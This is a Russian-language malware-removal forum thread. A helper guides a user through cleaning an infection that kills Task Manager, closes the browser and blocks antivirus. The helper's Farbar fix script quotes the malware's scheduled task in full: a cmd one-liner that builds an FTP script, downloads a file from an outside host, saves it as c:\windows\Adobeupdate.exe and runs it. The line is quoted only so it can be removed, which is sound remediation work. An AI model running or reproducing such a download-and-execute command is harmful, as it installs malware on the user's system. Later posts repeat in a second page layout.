Вирус закрывает диспетчер задач и браузер, не дает установить антивирус

@jajafold · Регистрация: 14.03.2022

Author24 — интернет-сервис помощи студентам

Здравствуйте!

Поймал вирус. Понял это, когда заметил, что винты теперь постоянно шумят, а когда открываешь диспетчер задач — загруженность 100% у процессора, но почти сразу же спадает.

Пытался найти процесс/службу, но безуспешно. Вирус через некоторое время закрывает диспетчер и procexp.
Искал в автозапуске, но там тоже пусто — в реестре ничего подозрительного не нашел.

Антивирусы тоже установить не дает: касперский банально не запускается, а все остальные либо не могут обновить базы, либо не делают анализ.

И вот сейчас заметил, что браузер иногда закрывается. А если конкретнее — когда перехожу на главную страницу киберфорума по лечению вирусов(знаю, звучит странно, но это так). Может еще какие-то страницы-триггеры у него есть, но пока нашел только такой.

Логи от AVZ прилагаю.

@jajafold · 14.03.2022, 12:25 **[ТС]**

UPD: Нашел taskhostw.exe в процессах. Корневая папка с процессом пуста(файлы скрыты), в планировщике он постоянно задействован, и в реестре запись об автозапуске имеется. Я так понимаю он и есть корень проблемы.

@thyrex · 14.03.2022, 16:14

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe
В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.

@jajafold · 14.03.2022, 16:49 **[ТС]**

Сделал.

@thyrex · 14.03.2022, 17:58

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной систе-мой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте за-пустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

@jajafold · 14.03.2022, 18:07 **[ТС]**

Готово.

@thyrex · 14.03.2022, 23:53

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Код

Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
Task: {E8108BE7-EC82-44A9-9664-DC47A434D7A9} - System32\Tasks\AdobeUpdateFlac => cmd /c echo open ftp2.ha7455h6fi1.net>>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.rar c:\windows\Adobeupdate.exe>>s&echo bye>>s&ftp -s:s&c:\windows\Adobeupdate.exe
2022-03-14 10:48 - 2022-03-14 10:48 - 000000091 _____ C:\Windows\system32\ps
2022-03-14 10:48 - 2022-03-14 10:48 - 000000090 _____ C:\Windows\system32\s
FirewallRules: [TCP Query User{5DDD8404-DFE6-4054-8003-8266668EE1B7}D:\steam\steamapps\common\cry of fear\cof.exe] => (Allow) D:\steam\steamapps\common\cry of fear\cof.exe => Нет файла
FirewallRules: [UDP Query User{AB18A60A-0BC5-432A-890A-08F58C73F5A7}D:\steam\steamapps\common\cry of fear\cof.exe] => (Allow) D:\steam\steamapps\common\cry of fear\cof.exe => Нет файла
FirewallRules: [{8225BA9C-D3D3-4668-AD4D-4EDDF96C0204}] => (Block) D:\steam\steamapps\common\cry of fear\cof.exe => Нет файла
FirewallRules: [{7A8568DA-7EED-45D4-8703-1A8426FDDA48}] => (Block) D:\steam\steamapps\common\cry of fear\cof.exe => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

Обратите внимание: будет выполнена перезагрузка компьютера.

@jajafold · 15.03.2022, 00:07 **[ТС]**

Выполнил по инструкции. Вот лог:

@thyrex · 15.03.2022, 00:22

Проблема решена?

@jajafold · 15.03.2022, 00:33 **[ТС]**

Процесса не наблюдаю, диспетчер и браузер работают стабильно. Установщики антивирусов запускаются. Вроде все хорошо.
Спасибо большое!

@thyrex · 16.03.2022, 06:37

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10);
Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
Прикрепите этот файл в своем следующем сообщении.

@thyrex 13213 / 7343 / 1558 Регистрация: 06.09.2009 Сообщений: 26,860
	16.03.2022, 06:37	11
	Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе. Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10); Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу; Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt; Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt; Прикрепите этот файл в своем следующем сообщении. 0

@jajafold 0 / 0 / 0 Регистрация: 14.03.2022 Сообщений: 6
	14.03.2022, 12:25 [ТС]	2
	UPD: Нашел taskhostw.exe в процессах. Корневая папка с процессом пуста(файлы скрыты), в планировщике он постоянно задействован, и в реестре запись об автозапуске имеется. Я так понимаю он и есть корень проблемы. 0

@thyrex 13213 / 7343 / 1558 Регистрация: 06.09.2009 Сообщений: 26,860
	14.03.2022, 16:14	3
	Скачайте AV block remover. Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению. После перезагрузки системы соберите новый CollectionLog Автологером. 0

@thyrex 13213 / 7343 / 1558 Регистрация: 06.09.2009 Сообщений: 26,860
	14.03.2022, 17:58	5
	Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной систе-мой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте за-пустить. Только одна из них запустится на Вашей системе. 1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files. 3. Нажмите кнопку Scan (Сканировать). 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению. 0

@thyrex 13213 / 7343 / 1558 Регистрация: 06.09.2009 Сообщений: 26,860
	15.03.2022, 00:22	9
	Проблема решена? 0

@jajafold 0 / 0 / 0 Регистрация: 14.03.2022 Сообщений: 6
	15.03.2022, 00:33 [ТС]	10
	Процесса не наблюдаю, диспетчер и браузер работают стабильно. Установщики антивирусов запускаются. Вроде все хорошо. Спасибо большое! 0